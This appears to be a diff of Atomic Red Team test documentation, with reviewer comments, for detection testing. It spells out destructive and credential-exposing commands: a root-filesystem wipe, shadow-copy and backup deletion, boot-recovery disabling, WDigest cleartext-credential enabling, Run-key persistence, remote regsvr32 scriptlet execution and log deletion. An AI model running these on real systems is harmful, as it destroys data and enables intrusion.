| file_path | Path of file to change modified timestamp | Path | $env:TEMP&#92;T1099_timestomp.txt|
| target_date_time | Date/time to replace original timestamps with | String | 1970-01-01 00:00:00|
@ -206,27 +215,37 @@ This technique was seen in use by the Stitch RAT.
```powershell
New-Item #{file_path} -Force
Set-Content #{file_path} -Value "atomic test" -Force
Get-ChildItem #{file_path} | % { $_.LastWriteTime = "#{target_date_time}" }
```
#### Cleanup Commands:
```powershell
Remove-Item #{file_path} -Force
Remove-Item #{file_path} -Force -ErrorAction Ignore
```
#### Dependencies: Run with `powershell`!
##### Description: A file must exist at the path (#{file_path}) to change the modified time on
##### Check Prereq Commands:
```powershell
if (Test-Path #{file_path}) {exit 0} else {exit 1}
```
##### Get Prereq Commands:
```powershell
New-Item -Path #{file_path} -Force | Out-Null
Set-Content #{file_path} -Value "T1099 Timestomp" -Force | Out-Null
```
<br/>
<br/>
## Atomic Test #7 - Windows - Modify file last access timestamp with PowerShell
Modifies the last access timestamp of a specified file.
This technique was seen in use by the Stitch RAT.
Modifies the last access timestamp of a specified file. This technique was seen in use by the Stitch RAT.
To verify execution, use File Explorer to view the Properties of the file and observe that the Accessed time is the year 1970.
**Supported Platforms:** Windows
@ -236,7 +255,7 @@ This technique was seen in use by the Stitch RAT.
#### Inputs:
| Name | Description | Type | Default Value |
|------|-------------|------|---------------|
| file_path | Path of file to change last access timestamp | Path | $env:APPDATA&#92;atomic.txt|
| file_path | Path of file to change last access timestamp | Path | $env:TEMP&#92;T1099_timestomp.txt|
| target_date_time | Date/time to replace original timestamps with | String | 1970-01-01 00:00:00|
@ -244,18 +263,29 @@ This technique was seen in use by the Stitch RAT.
```powershell
New-Item #{file_path} -Force
Set-Content #{file_path} -Value "atomic test" -Force
Get-ChildItem #{file_path} | % { $_.LastAccessTime = "#{target_date_time}" }
```
#### Cleanup Commands:
```powershell
Remove-Item #{file_path} -Force
Remove-Item #{file_path} -Force -ErrorAction Ignore
```
#### Dependencies: Run with `powershell`!
##### Description: A file must exist at the path (#{file_path}) to change the last access time on
##### Check Prereq Commands:
```powershell
if (Test-Path #{file_path}) {exit 0} else {exit 1}
```
##### Get Prereq Commands:
```powershell
New-Item -Path #{file_path} -Force | Out-Null
Set-Content #{file_path} -Value "T1099 Timestomp" -Force | Out-Null
```
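Review bot: same unquoted `#{file_path}` issue as in the creation-time and last-write tests above; quote the substitution. For this test the verification step deserves a caveat: on volumes where NTFS last-access updates are enabled, anything that reads the file's content afterwards can push the Accessed time forward again, so check `(Get-Item "#{file_path}").LastAccessTime` right after the test rather than relying on the Properties dialog later.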
<br/>

View File

@ -20,19 +20,11 @@ There are tools available from the host operating system to perform cleanup, but
- [Atomic Test #7 - Delete an entire folder - Windows PowerShell](#atomic-test-7---delete-an-entire-folder---windows-powershell)
- [Atomic Test #8 - Delete VSS - vssadmin](#atomic-test-8---delete-vss---vssadmin)
- [Atomic Test #8 - Delete Filesystem - Linux](#atomic-test-8---delete-filesystem---linux)
- [Atomic Test #9 - Delete VSS - wmic](#atomic-test-9---delete-vss---wmic)
- [Atomic Test #9 - Delete-PrefetchFile](#atomic-test-9---delete-prefetchfile)
- [Atomic Test #10 - bcdedit](#atomic-test-10---bcdedit)
- [Atomic Test #11 - wbadmin](#atomic-test-11---wbadmin)
- [Atomic Test #12 - Delete Filesystem - Linux](#atomic-test-12---delete-filesystem---linux)
- [Atomic Test #13 - Delete-PrefetchFile](#atomic-test-13---delete-prefetchfile)
- [Atomic Test #14 - Delete TeamViewer Log Files](#atomic-test-14---delete-teamviewer-log-files)
- [Atomic Test #10 - Delete TeamViewer Log Files](#atomic-test-10---delete-teamviewer-log-files)
<br/>
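Review bot: the table of contents drops the VSS (vssadmin, wmic), bcdedit and wbadmin tests from this technique without any pointer to where they went; if they moved to another technique, the commit message or this page should say which, otherwise the mapping from those commands to an ATT&CK technique silently disappears from the corpus. Also check that the regenerated anchors (`#atomic-test-8---delete-filesystem---linux`, `#atomic-test-9---delete-prefetchfile`, `#atomic-test-10---delete-teamviewer-log-files`) match the renumbered headings below.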
@ -125,203 +117,172 @@ shred -u #{file_to_shred}
<br/>
## Atomic Test #4 - Delete a single file - Windows cmd
Delete a single file from the temporary directory using cmd.exe
Delete a single file from the temporary directory using cmd.exe.
Upon execution, no output will be displayed. Use File Explorer to verify the file was deleted.
**Supported Platforms:** Windows
#### Inputs:
| Name | Description | Type | Default Value |
|------|-------------|------|---------------|
| file_to_delete | File to delete. Run the prereq command to create it if it does not exist. | string | %temp%&#92;deleteme_T1107|
#### Attack Commands: Run with `command_prompt`!
```cmd
echo "T1107" > %temp%\T1107.txt
del /f %temp%\T1107.txt >nul 2>&1
del /f #{file_to_delete}
```
#### Dependencies: Run with `command_prompt`!
##### Description: The file to delete must exist on disk at specified location (#{file_to_delete})
##### Check Prereq Commands:
```cmd
IF EXIST "#{file_to_delete}" ( EXIT 0 ) ELSE ( EXIT 1 )
```
##### Get Prereq Commands:
```cmd
echo deleteme_T1107 >> #{file_to_delete}
```
<br/>
<br/>
## Atomic Test #5 - Delete an entire folder - Windows cmd
Recursively delete the temporary directory and all files contained within it using cmd.exe
Recursively delete a folder in the temporary directory using cmd.exe.
Upon execution, no output will be displayed. Use File Explorer to verify the folder was deleted.
**Supported Platforms:** Windows
#### Inputs:
| Name | Description | Type | Default Value |
|------|-------------|------|---------------|
| folder_to_delete | Folder to delete. Run the prereq command to create it if it does not exist. | string | %temp%&#92;deleteme_T1107|
#### Attack Commands: Run with `command_prompt`!
```cmd
mkdir %temp%\T1107
rmdir /s /q %temp%\T1107
rmdir /s /q #{folder_to_delete}
```
#### Dependencies: Run with `command_prompt`!
##### Description: The file to delete must exist on disk at specified location (#{folder_to_delete})
##### Check Prereq Commands:
```cmd
IF EXIST "#{folder_to_delete}" ( EXIT 0 ) ELSE ( EXIT 1 )
```
##### Get Prereq Commands:
```cmd
mkdir #{folder_to_delete}
```
<br/>
<br/>
## Atomic Test #6 - Delete a single file - Windows PowerShell
Delete a single file from the temporary directory using Powershell
Delete a single file from the temporary directory using Powershell. Upon execution, no output will be displayed. Use File Explorer to verify the file was deleted.
**Supported Platforms:** Windows
#### Inputs:
| Name | Description | Type | Default Value |
|------|-------------|------|---------------|
| file_to_delete | File to delete. Run the prereq command to create it if it does not exist. | string | $env:TEMP&#92;deleteme_T1107|
#### Attack Commands: Run with `powershell`!
```powershell
New-Item $env:TEMP\T1107.txt
Remove-Item -path $env:TEMP\T1107.txt
Remove-Item -path #{file_to_delete}
```
#### Dependencies: Run with `powershell`!
##### Description: The file to delete must exist on disk at specified location (#{file_to_delete})
##### Check Prereq Commands:
```powershell
if (Test-Path #{file_to_delete}) {exit 0} else {exit 1}
```
##### Get Prereq Commands:
```powershell
New-Item -Path #{file_to_delete} | Out-Null
```
<br/>
<br/>
## Atomic Test #7 - Delete an entire folder - Windows PowerShell
Recursively delete the temporary directory and all files contained within it using Powershell
Recursively delete a folder in the temporary directory using Powershell. Upon execution, no output will be displayed. Use File Explorer to verify the folder was deleted.
**Supported Platforms:** Windows
#### Inputs:
| Name | Description | Type | Default Value |
|------|-------------|------|---------------|
| folder_to_delete | Folder to delete. Run the prereq command to create it if it does not exist. | string | $env:TEMP&#92;deleteme_folder_T1107|
#### Attack Commands: Run with `powershell`!
```powershell
New-Item $env:TEMP\T1107 -ItemType Directory
Remove-Item -path $env:TEMP\T1107 -recurse
Remove-Item -Path #{folder_to_delete} -Recurse
```
<br/>
<br/>
## Atomic Test #8 - Delete VSS - vssadmin
Delete all volume shadow copies with vssadmin.exe
**Supported Platforms:** Windows
#### Attack Commands: Run with `command_prompt`! Elevation Required (e.g. root or admin)
```cmd
vssadmin.exe Delete Shadows /All /Quiet
#### Dependencies: Run with `powershell`!
##### Description: The folder to delete must exist on disk at specified location (#{folder_to_delete})
##### Check Prereq Commands:
```powershell
if (Test-Path #{folder_to_delete}) {exit 0} else {exit 1}
```
##### Get Prereq Commands:
```powershell
New-Item -Path #{folder_to_delete} -Type Directory | Out-Null
```
<br/>
<br/>
## Atomic Test #9 - Delete VSS - wmic
Delete all volume shadow copies with wmic
**Supported Platforms:** Windows
#### Attack Commands: Run with `command_prompt`! Elevation Required (e.g. root or admin)
```cmd
wmic shadowcopy delete
```
<br/>
<br/>
## Atomic Test #10 - bcdedit
This test leverages `bcdedit` to remove boot-time recovery measures.
**Supported Platforms:** Windows
#### Attack Commands: Run with `command_prompt`! Elevation Required (e.g. root or admin)
```cmd
bcdedit /set {default} bootstatuspolicy ignoreallfailures
bcdedit /set {default} recoveryenabled no
```
<br/>
<br/>
## Atomic Test #11 - wbadmin
This test deletes Windows Backup catalogs.
**Supported Platforms:** Windows
#### Attack Commands: Run with `command_prompt`! Elevation Required (e.g. root or admin)
```cmd
wbadmin delete catalog -quiet
```
<br/>
<br/>
## Atomic Test #12 - Delete Filesystem - Linux
## Atomic Test #8 - Delete Filesystem - Linux
This test deletes the entire root filesystem of a Linux system. This technique was used by Amnesia IoT malware to avoid analysis. This test is dangerous and destructive, do NOT use on production equipment.
**Supported Platforms:** Linux
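Review bot: Tests #4 and #5 now share the default path `%temp%\deleteme_T1107`, one as a file and one as a folder. If #5 runs first (or its folder is left behind), #4's Get Prereq `echo deleteme_T1107 >> #{file_to_delete}` fails against a directory and `del /f` does nothing; if #4 runs first, #5's `mkdir` only works because the file is already gone. Give the folder test its own default, as the PowerShell variant already does with `deleteme_folder_T1107`. Smaller points: the dependency description for Test #5 says "The file to delete" for a folder, and the PowerShell `Test-Path`/`Remove-Item` lines should quote `#{file_to_delete}` and `#{folder_to_delete}` so paths with spaces work.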
@ -345,8 +306,9 @@ rm -rf / --no-preserve-root > /dev/null 2> /dev/null
<br/>
<br/>
## Atomic Test #13 - Delete-PrefetchFile
Delete a single prefetch file. Deletion of prefetch files is a known anti-forensic technique.
## Atomic Test #9 - Delete-PrefetchFile
Delete a single prefetch file. Deletion of prefetch files is a known anti-forensic technique. To verify execution, Run "(Get-ChildItem -Path "$Env:SystemRoot\prefetch\*.pf" | Measure-Object).Count"
before and after the test to verify that the number of prefetch files decreases by 1.
**Supported Platforms:** Windows
@ -369,34 +331,46 @@ Remove-Item -Path (Join-Path "$Env:SystemRoot\prefetch\" (Get-ChildItem -Path "$
<br/>
<br/>
## Atomic Test #14 - Delete TeamViewer Log Files
## Atomic Test #10 - Delete TeamViewer Log Files
Adversaries may delete TeamViewer log files to hide activity. This should provide a high true-positive alert ration.
This test just places the files in a non-TeamViewer folder, a detection would just check for a deletion event matching the TeamViewer
log file format of TeamViewerXX_Logfile.log
log file format of TeamViewer_##.log. Upon execution, no output will be displayed. Use File Explorer to verify the folder was deleted.
https://twitter.com/SBousseaden/status/1197524463304290305?s=20
**Supported Platforms:** Windows, macOS
**Supported Platforms:** Windows
#### Inputs:
| Name | Description | Type | Default Value |
|------|-------------|------|---------------|
| teamviewer_log_file | Teamviewer log file to delete. Run the prereq command to create it if it does not exist. | string | $env:TEMP&#92;TeamViewer_54.log|
#### Attack Commands: Run with `powershell`!
```powershell
if ($env:os -eq "Windows_NT") {
New-Item $env:TEMP\TeamViewer_54.log
Remove-Item $env:TEMP\TeamViewer_54.log
} else {
New-Item $env:HOME\TeamViewer_54.log
Remove-Item $env:HOME\TeamViewer_54.log
}
Remove-Item #{teamviewer_log_file}
```
#### Dependencies: Run with `powershell`!
##### Description: The folder to delete must exist on disk at specified location (#{teamviewer_log_file})
##### Check Prereq Commands:
```powershell
if (Test-Path #{teamviewer_log_file}) {exit 0} else {exit 1}
```
##### Get Prereq Commands:
```powershell
New-Item -Path #{teamviewer_log_file} | Out-Null
```
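Review bot: the rewritten description changes the log-file pattern to `TeamViewer_##.log`, but the desktop client writes files named like `TeamViewer15_Logfile.log` (the removed `TeamViewerXX_Logfile.log` wording was closer), so a detection written from this text would miss real deletions; either keep the real pattern, with a default input that matches it, or state that `TeamViewer_54.log` is a stand-in name. Smaller fixes: "alert ration" -> "alert ratio", and both the verification sentence and the dependency description say "folder" for what is a file.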
<br/>

View File

@ -14,21 +14,18 @@ The Registry of a remote system may be modified to aid in execution of files as
- [Atomic Test #2 - Modify Registry of Local Machine - cmd](#atomic-test-2---modify-registry-of-local-machine---cmd)
- [Atomic Test #3 - Modify Registry of Another User Profile](#atomic-test-3---modify-registry-of-another-user-profile)
- [Atomic Test #3 - Modify registry to store logon credentials](#atomic-test-3---modify-registry-to-store-logon-credentials)
- [Atomic Test #4 - Modify registry to store logon credentials](#atomic-test-4---modify-registry-to-store-logon-credentials)
- [Atomic Test #4 - Add domain to Trusted sites Zone](#atomic-test-4---add-domain-to-trusted-sites-zone)
- [Atomic Test #5 - Modify registry to store PowerShell code](#atomic-test-5---modify-registry-to-store-powershell-code)
- [Atomic Test #6 - Add domain to Trusted sites Zone](#atomic-test-6---add-domain-to-trusted-sites-zone)
- [Atomic Test #7 - Javascript in registry](#atomic-test-7---javascript-in-registry)
- [Atomic Test #5 - Javascript in registry](#atomic-test-5---javascript-in-registry)
<br/>
## Atomic Test #1 - Modify Registry of Current User Profile - cmd
Modify the registry of the currently logged in user using reg.exe cia cmd console
Modify the registry of the currently logged in user using reg.exe via cmd console. Upon execution, the message "The operation completed successfully."
will be displayed. Additionally, open Registry Editor to view the new entry in HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced.
**Supported Platforms:** Windows
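Review bot: "cia cmd console" -> "via cmd console" is fixed in the new text, good. The table of contents drops "Modify Registry of Another User Profile" and "Modify registry to store PowerShell code" from this technique; if the PowerShell-code test moved elsewhere, say where, because a base64 script body stored under a registry value is a useful fileless indicator that should not vanish from the corpus without a trace.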
@ -57,19 +54,25 @@ reg delete HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\
## Atomic Test #2 - Modify Registry of Local Machine - cmd
Modify the Local Machine registry RUN key to change Windows Defender executable that should be ran on startup. This should only be possible when
CMD is ran as Administrative rights.
CMD is ran as Administrative rights. Upon execution, the message "The operation completed successfully."
will be displayed. Additionally, open Registry Editor to view the modified entry in HKCU\Software\Microsoft\Windows\CurrentVersion\Run.
**Supported Platforms:** Windows
#### Inputs:
| Name | Description | Type | Default Value |
|------|-------------|------|---------------|
| new_executable | New executable to run on startup instead of Windows Defender | string | calc.exe|
#### Attack Commands: Run with `command_prompt`! Elevation Required (e.g. root or admin)
```cmd
reg add HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run /t REG_EXPAND_SZ /v SecurityHealth /d {some_other_executable} /f
reg add HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run /t REG_EXPAND_SZ /v SecurityHealth /d #{new_executable} /f
```
#### Cleanup Commands:
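Review bot: the verification text points at the wrong hive: the command writes `HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run`, not `HKCU\...\Run`, so a reader following the sentence looks in the wrong place (HKLM is also why admin rights are needed; "ran as Administrative rights" -> "run with administrative rights"). The test also overwrites the real `SecurityHealth` Run value, which normally launches `%windir%\system32\SecurityHealthSystray.exe`; the cleanup in the following lines deletes the value instead of restoring it, so after cleanup the Windows Security tray icon no longer autostarts. Save the original data before `reg add` and restore it in cleanup.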
@ -84,83 +87,10 @@ reg delete HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run /v S
<br/>
<br/>
## Atomic Test #3 - Modify Registry of Another User Profile
Modify a registry key of each user profile not currently loaded on the machine using both powershell and cmd line tools.
**Supported Platforms:** Windows
#### Attack Commands: Run with `powershell`! Elevation Required (e.g. root or admin)
```powershell
# here is an example of using the same method of reg load, but without the New-PSDrive cmdlet.
# Here we can load all unloaded user hives and do whatever we want in the location below (comments)
$PatternSID = 'S-1-5-21-\d+-\d+\-\d+\-\d+$'
Write-Verbose -Message 'Gathering Profile List and loading their registry hives'
# Get Username, SID, and location of ntuser.dat for all users
$ProfileList = @()
$ProfileList = Get-ItemProperty 'HKLM:\SOFTWARE\Microsoft\Windows NT\CurrentVersion\ProfileList\*' | Where-Object { $_.PSChildName -match $PatternSID } |
Select @{ name = "SID"; expression = { $_.PSChildName } },
@{ name = "UserHive"; expression = { "$($_.ProfileImagePath)\ntuser.dat" } },
@{ name = "Username"; expression = { $_.ProfileImagePath -replace '^(.*[\\\/])', '' } }
# Get all user SIDs found in HKEY_USERS (ntuder.dat files that are loaded)
$LoadedHives = Get-ChildItem Registry::HKEY_USERS | ? { $_.PSChildname -match $PatternSID } | Select @{ name = "SID"; expression = { $_.PSChildName } }
$SIDObject = @()
foreach ($item in $LoadedHives)
{
$props = @{
SID = $item.SID
}
$TempSIDObject = New-Object -TypeName PSCustomObject -Property $props
$SIDObject += $TempSIDObject
}
# We need to use ($ProfileList | Measure-Object).count instead of just ($ProfileList).count because in PS V2
# if the count is less than 2 it doesn't work. :)
for ($p = 0; $p -lt ($ProfileList | Measure-Object).count; $p++)
{
for ($l = 0; $l -lt ($SIDObject | Measure-Object).count; $l++)
{
if (($ProfileList[$p].SID) -ne ($SIDObject[$l].SID))
{
$UnloadedHives += $ProfileList[$p].SID
Write-Verbose -Message "Loading Registry hives for $($ProfileList[$p].SID)"
reg load "HKU\$($ProfileList[$p].SID)" "$($ProfileList[$p].UserHive)"
Write-Verbose -Message 'Attempting to modify registry keys for each profile'
#####################################################################
reg add "HKEY_CURRENT_USER\$($ProfileList[$p].SID)\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced" /t REG_DWORD /v HideFileExt /d 1 /f
}
}
}
Write-Verbose 'Unloading Registry hives for all users'
# Unload ntuser.dat
### Garbage collection and closing of ntuser.dat ###
[gc]::Collect()
reg unload "HKU\$($ProfileList[$p].SID)"
```
<br/>
<br/>
## Atomic Test #4 - Modify registry to store logon credentials
Sets registry key that will tell windows to store plaintext passwords (making the system vulnerable to clear text / cleartext password dumping)
## Atomic Test #3 - Modify registry to store logon credentials
Sets registry key that will tell windows to store plaintext passwords (making the system vulnerable to clear text / cleartext password dumping).
Upon execution, the message "The operation completed successfully." will be displayed.
Additionally, open Registry Editor to view the modified entry in HKLM\SYSTEM\CurrentControlSet\Control\SecurityProviders\WDigest.
**Supported Platforms:** Windows
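Review bot: "store plaintext passwords" overstates what `UseLogonCredential` does: setting it to 1 makes WDigest keep the user's cleartext credential in LSASS memory, where LSASS-dumping tools can read it; nothing is written to disk, and it only affects logons that happen after the change, which the description should say so testers know a fresh logon is needed before dumping. The removed "Modify Registry of Another User Profile" script is fine to drop: it loaded hives under `HKU\<SID>` but then wrote to `HKEY_CURRENT_USER\<SID>\...`, never initialised `$UnloadedHives`, and the single `reg unload` after the loops only unloaded the last profile.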
@ -187,8 +117,12 @@ reg add HKLM\SYSTEM\CurrentControlSet\Control\SecurityProviders\WDigest /v UseLo
<br/>
<br/>
## Atomic Test #5 - Modify registry to store PowerShell code
Sets Windows Registry key containing base64-encoded PowerShell code.
## Atomic Test #4 - Add domain to Trusted sites Zone
Attackers may add a domain to the trusted site zone to bypass defenses. Doing this enables attacks such as c2 over office365.
Upon execution, details of the new registry entries will be displayed.
Additionally, open Registry Editor to view the modified entry in HKCU:\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\.
https://www.blackhat.com/docs/us-17/wednesday/us-17-Dods-Infecting-The-Enterprise-Abusing-Office365-Powershell-For-Covert-C2.pdf
**Supported Platforms:** Windows
@ -198,49 +132,14 @@ Sets Windows Registry key containing base64-encoded PowerShell code.
#### Inputs:
| Name | Description | Type | Default Value |
|------|-------------|------|---------------|
| powershell_command | PowerShell command to encode | String | Write-Host "Hey, Atomic!"|
| registry_key_storage | Windows Registry Key to store code | String | HKCU:Software&#92;Microsoft&#92;Windows&#92;CurrentVersion|
| registry_entry_storage | Windows Registry entry to store code under key | String | Debug|
| bad_domain | Domain to add to trusted site zone | String | bad-domain.com|
#### Attack Commands: Run with `powershell`!
```powershell
$OriginalCommand = '#{powershell_command}'
$Bytes = [System.Text.Encoding]::Unicode.GetBytes($OriginalCommand)
$EncodedCommand =[Convert]::ToBase64String($Bytes)
$EncodedCommand
Set-ItemProperty -Force -Path #{registry_key_storage} -Name #{registry_entry_storage} -Value $EncodedCommand
```
#### Cleanup Commands:
```powershell
Remove-ItemProperty -Force -Path #{registry_key_storage} -Name #{registry_entry_storage} -ErrorAction Ignore
```
<br/>
<br/>
## Atomic Test #6 - Add domain to Trusted sites Zone
Attackers may add a domain to the trusted site zone to bypass defenses. Doing this enables attacks such as c2 over office365 as described here:
https://www.blackhat.com/docs/us-17/wednesday/us-17-Dods-Infecting-The-Enterprise-Abusing-Office365-Powershell-For-Covert-C2.pdf
**Supported Platforms:** Windows
#### Attack Commands: Run with `powershell`!
```powershell
$key= "HKCU:\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\Domains\bad-domain.com\"
$key= "HKCU:\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\Domains\#{bad_domain}\"
$name ="bad-subdomain"
new-item $key -Name $name -Force
new-itemproperty $key$name -Name https -Value 2 -Type DWORD;
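Review bot: `bad_domain` is now an input but `$name ="bad-subdomain"` stays hardcoded, so the trusted entry is always `bad-subdomain.<bad_domain>` under `...\ZoneMap\Domains\#{bad_domain}\`; either parameterise the subdomain too or say in the description that the entry created is `bad-subdomain.#{bad_domain}`, since that is the host name a detection rule or a zone-map audit will see. The `-Value 2` entries mean zone 2 (Trusted Sites); worth stating in the description so the number is not mistaken for a flag.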
@ -250,7 +149,7 @@ new-itemproperty $key$name -Name * -Value 2 -Type DWORD;
#### Cleanup Commands:
```powershell
$key = "HKCU:\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\Domains\bad-domain.com\"
$key = "HKCU:\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\Domains\#{bad_domain}\"
Remove-item $key -Recurse -ErrorAction Ignore
```
@ -261,8 +160,9 @@ Remove-item $key -Recurse -ErrorAction Ignore
<br/>
<br/>
## Atomic Test #7 - Javascript in registry
Upon execution, a javascript block will be placed in the registry for persistence
## Atomic Test #5 - Javascript in registry
Upon execution, a javascript block will be placed in the registry for persistence.
Additionally, open Registry Editor to view the modified entry in HKCU:\Software\Microsoft\Windows\CurrentVersion\Internet Settings.
**Supported Platforms:** Windows
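Review bot: the verification sentences here and in the Trusted Sites test quote the key with PowerShell drive syntax (`HKCU:\Software\...`), which is not what Registry Editor shows; write `HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings` in the "open Registry Editor" instructions and keep `HKCU:` for the commands. The sentence also says "modified entry" without naming the value, so say which value holds the JavaScript block.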

View File

@ -20,7 +20,7 @@ Regsvr32.exe can also be leveraged to register a COM Object used to establish Pe
<br/>
## Atomic Test #1 - Regsvr32 local COM scriptlet execution
Regsvr32.exe is a command-line program used to register and unregister OLE controls
Regsvr32.exe is a command-line program used to register and unregister OLE controls. Upon execution, calc.exe will be launched.
**Supported Platforms:** Windows
@ -62,7 +62,8 @@ Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/ato
<br/>
## Atomic Test #2 - Regsvr32 remote COM scriptlet execution
Regsvr32.exe is a command-line program used to register and unregister OLE controls
Regsvr32.exe is a command-line program used to register and unregister OLE controls. This test may be blocked by windows defender; disable
windows defender real-time protection to fix it. Upon execution, calc.exe will be launched.
**Supported Platforms:** Windows
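Review bot: telling testers to "disable windows defender real-time protection to fix it" is the wrong advice for a test whose point is whether remote scriptlet execution via `regsvr32.exe /s /u /i:#{url} scrobj.dll` (the next hunk's context) gets caught: a Defender block is a successful detection and should be recorded as such, and the calc.exe check simply does not happen. Suggest wording it as "Windows Defender may block this test; record the block as a detection, or add an exclusion on an isolated lab host if you need calc.exe to launch", rather than disabling real-time protection on the box.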
@ -91,7 +92,7 @@ regsvr32.exe /s /u /i:#{url} scrobj.dll
<br/>
## Atomic Test #3 - Regsvr32 local DLL execution
Regsvr32.exe is a command-line program used to register and unregister OLE controls
Regsvr32.exe is a command-line program used to register and unregister OLE controls. Upon execution, calc.exe will be launched.
**Supported Platforms:** Windows

View File

@ -18,7 +18,8 @@ This technique may incorporate use of other techniques such as [File and Directo
<br/>
## Atomic Test #1 - Automated Collection Command Prompt
Automated Collection
Automated Collection. Upon execution, check the users temp directory (%temp%) for the folder T1119_command_prompt_collection
to see what was collected.
**Supported Platforms:** Windows
@ -30,10 +31,15 @@ Automated Collection
```cmd
mkdir %temp%\T1119_command_prompt_collection >nul 2>&1
dir c: /b /s .docx | findstr /e .docx
for /R c: %f in (*.docx) do copy %f c:\temp\
for /R c: %f in (*.docx) do copy %f %temp%\T1119_command_prompt_collection
```
#### Cleanup Commands:
```cmd
del %temp%\T1119_command_prompt_collection /F /Q >null 2>&1
```
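Review bot: the cleanup line `del %temp%\T1119_command_prompt_collection /F /Q >null 2>&1` has two defects: `>null` redirects to a file literally named `null` (the device is `nul`), and `del` on a directory only removes the files inside it, so the folder the description tells the reader to look for survives cleanup. Use `rmdir /S /Q %temp%\T1119_command_prompt_collection >nul 2>&1`. In the attack block, the unquoted `%f` in `copy %f %temp%\...` also breaks on paths containing spaces; `copy "%f" ...` is safer.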
@ -43,7 +49,8 @@ for /R c: %f in (*.docx) do copy %f c:\temp\
<br/>
## Atomic Test #2 - Automated Collection PowerShell
Automated Collection
Automated Collection. Upon execution, check the users temp directory (%temp%) for the folder T1119_powershell_collection
to see what was collected.
**Supported Platforms:** Windows
@ -55,9 +62,14 @@ Automated Collection
```powershell
Get-ChildItem -Recurse -Include *.doc | % {Copy-Item $_.FullName -destination c:\temp}
New-Item -Path $env:TEMP\T1119_powershell_collection -ItemType Directory -Force | Out-Null
Get-ChildItem -Recurse -Include *.doc | % {Copy-Item $_.FullName -destination $env:TEMP\T1119_powershell_collection}
```
#### Cleanup Commands:
```powershell
Remove-Item $env:TEMP\T1119_powershell_collection -Force | Out-Null
```
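Review bot: `Remove-Item $env:TEMP\T1119_powershell_collection -Force` in the cleanup block targets a directory that now contains the copied files; without `-Recurse` PowerShell prompts for confirmation, which stalls a non-interactive run. Use `Remove-Item $env:TEMP\T1119_powershell_collection -Recurse -Force -ErrorAction Ignore`. Separately, `Get-ChildItem -Recurse -Include *.doc` without `-Path` only searches the current working directory, so what gets collected depends on where the test is launched from; an explicit root such as `-Path $env:USERPROFILE` makes the result reproducible.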
@ -67,7 +79,8 @@ Get-ChildItem -Recurse -Include *.doc | % {Copy-Item $_.FullName -destination c:
<br/>
## Atomic Test #3 - Recon information for export with PowerShell
collect information for exfiltration
collect information for exfiltration. Upon execution, check the users temp directory (%temp%) for files T1119_*.txt
to see what was collected.
**Supported Platforms:** Windows
@ -99,7 +112,8 @@ Remove-Item $env:TEMP\T1119_3.txt -ErrorAction Ignore
<br/>
## Atomic Test #4 - Recon information for export with Command Prompt
collect information for exfiltration
collect information for exfiltration. Upon execution, check the users temp directory (%temp%) for files T1119_*.txt
to see what was collected.
**Supported Platforms:** Windows

View File

@ -14,7 +14,7 @@ Adversaries can use Regsvcs and Regasm to proxy execution of code through a trus
<br/>
## Atomic Test #1 - Regasm Uninstall Method Call Test
Executes the Uninstall Method, No Admin Rights Required
Executes the Uninstall Method, No Admin Rights Required. Upon execution, "I shouldn't really execute either." will be displayed.
**Supported Platforms:** Windows
@ -62,7 +62,8 @@ Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/ato
<br/>
## Atomic Test #2 - Regsvs Uninstall Method Call Test
Executes the Uninstall Method, No Admin Rights Required, Requires SNK
Executes the Uninstall Method, No Admin Rights Required, Requires SNK. Upon execution, "I shouldn't really execute" will be displayed
along with other information about the assembly being installed.
**Supported Platforms:** Windows

View File

@ -14,7 +14,7 @@ An adversary may gather the system time and/or time zone from a local or remote
<br/>
## Atomic Test #1 - System Time Discovery
Identify the system time
Identify the system time. Upon execution, the local computer system time and timezone will be displayed.
**Supported Platforms:** Windows
@ -44,7 +44,7 @@ w32tm /tz
<br/>
## Atomic Test #2 - System Time Discovery - PowerShell
Identify the system time via PowerShell
Identify the system time via PowerShell. Upon execution, the system time will be displayed.
**Supported Platforms:** Windows

View File

@ -100,7 +100,8 @@ dscl . -delete /Users/#{username}
<br/>
## Atomic Test #3 - Create a new user in a command prompt
Creates a new user in a command prompt
Creates a new user in a command prompt. Upon execution, "The command completed successfully." will be displayed. To verify the
new account, run "net user" in powershell or CMD and observe that there is a new user named "T1136_CMD"
**Supported Platforms:** Windows
@ -134,7 +135,8 @@ net user /del "#{username}"
<br/>
## Atomic Test #4 - Create a new user in PowerShell
Creates a new user in PowerShell
Creates a new user in PowerShell. Upon execution, details about the new account will be displayed in the powershell session. To verify the
new account, run "net user" in powershell or CMD and observe that there is a new user named "T1136_PowerShell"
**Supported Platforms:** Windows

View File

@ -26,11 +26,8 @@ To keep shims secure, Windows designed them to run in user mode so they cannot m
<br/>
## Atomic Test #1 - Application Shim Installation
To test injecting DLL into a custom application
you need to copy AtomicShim.dll Into C:\Tools
As well as Compile the custom app.
We believe observing the shim install is a good
place to start.
Install a shim database. This technique is used for privelage escalation and bypassing user access control. Upon execution, "Installation of AtomicShim complete."
will be displayed.
**Supported Platforms:** Windows
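Review bot: this hunk drops the setup instructions (copy AtomicShim.dll into C:\Tools, compile the custom app) without replacing them with a Dependencies / Get Prereq block like the other tests in this commit, so the reader no longer learns what must exist before `sdbinst.exe #{file_path}` produces anything observable. Either keep that text or add prereq commands. Typos in the new description: "privelage" should be "privilege", and "bypassing user access control" should read "bypassing User Account Control (UAC)".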
@ -48,9 +45,12 @@ place to start.
```cmd
sdbinst.exe #{file_path}
sdbinst.exe -u #{file_path}
```
#### Cleanup Commands:
```cmd
sdbinst.exe -u #{file_path}
```
